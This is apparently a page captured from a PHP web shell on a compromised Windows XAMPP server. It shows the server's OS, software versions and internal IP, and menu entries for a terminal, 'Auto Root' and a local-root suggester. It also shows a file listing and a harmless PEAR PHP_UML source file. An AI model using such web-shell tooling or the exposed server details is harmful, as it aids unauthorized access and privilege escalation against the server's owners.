Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.52
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
php_old /
pear /
PHP /
UML /
Metamodel /
Delete
Unzip
Name
Size
Permission
Date
Action
Artifact.php
715
B
-rw-rw-rw-
2016-01-27 13:08
Class.php
682
B
-rw-rw-rw-
2016-01-27 13:08
Classifier.php
847
B
-rw-rw-rw-
2016-01-27 13:08
Datatype.php
639
B
-rw-rw-rw-
2016-01-27 13:08
Enumeration.php
995
B
-rw-rw-rw-
2016-01-27 13:08
Helper.php
7.66
KB
-rw-rw-rw-
2016-01-27 13:08
Interface.php
559
B
-rw-rw-rw-
2016-01-27 13:08
NamedElement.php
1.38
KB
-rw-rw-rw-
2016-01-27 13:08
Operation.php
733
B
-rw-rw-rw-
2016-01-27 13:08
Package.php
733
B
-rw-rw-rw-
2016-01-27 13:08
Parameter.php
628
B
-rw-rw-rw-
2016-01-27 13:08
Property.php
715
B
-rw-rw-rw-
2016-01-27 13:08
Stereotype.php
877
B
-rw-rw-rw-
2016-01-27 13:08
Superstructure.php
10.23
KB
-rw-rw-rw-
2016-01-27 13:08
Tag.php
571
B
-rw-rw-rw-
2016-01-27 13:08
Type.php
564
B
-rw-rw-rw-
2016-01-27 13:08
TypeResolver.php
3.26
KB
-rw-rw-rw-
2016-01-27 13:08
TypeResolverById.php
5.12
KB
-rw-rw-rw-
2016-01-27 13:08
TypeResolverByName.php
5.43
KB
-rw-rw-rw-
2016-01-27 13:08
TypedElement.php
582
B
-rw-rw-rw-
2016-01-27 13:08
Save
Rename
<?php /** * @category PHP * @package PHP_UML * @subpackage Metamodel * @author Baptiste Autin <ohlesbeauxjours@yahoo.fr> * @license http://www.gnu.org/licenses/lgpl.html LGPL License 3 * @version SVN: $Revision: 136 $ * @link http://pear.php.net/package/PHP_UML * @since $Date: 2009-12-10 01:35:58 +0100 (jeu., 10 déc. 2009) $ * */ /** * Meta-Enumeration * Enumerates some basic PHP classifiers. * */ class PHP_UML_Metamodel_Enumeration { /** * PHP datatypes * * @var array */ static public $datatypes = array('mixed', 'array', 'string', 'int', 'integer', 'bool', 'boolean', 'float', 'void', 'null', 'object', 'resource'); static public $interfaces = array('Iterator', 'Countable'); static public $classes = array('Exception'); /** * Main file types. Used as stereotypes for qualifying the artifacts. * * @var array */ static public $filetype = array('PHP File'); } ?>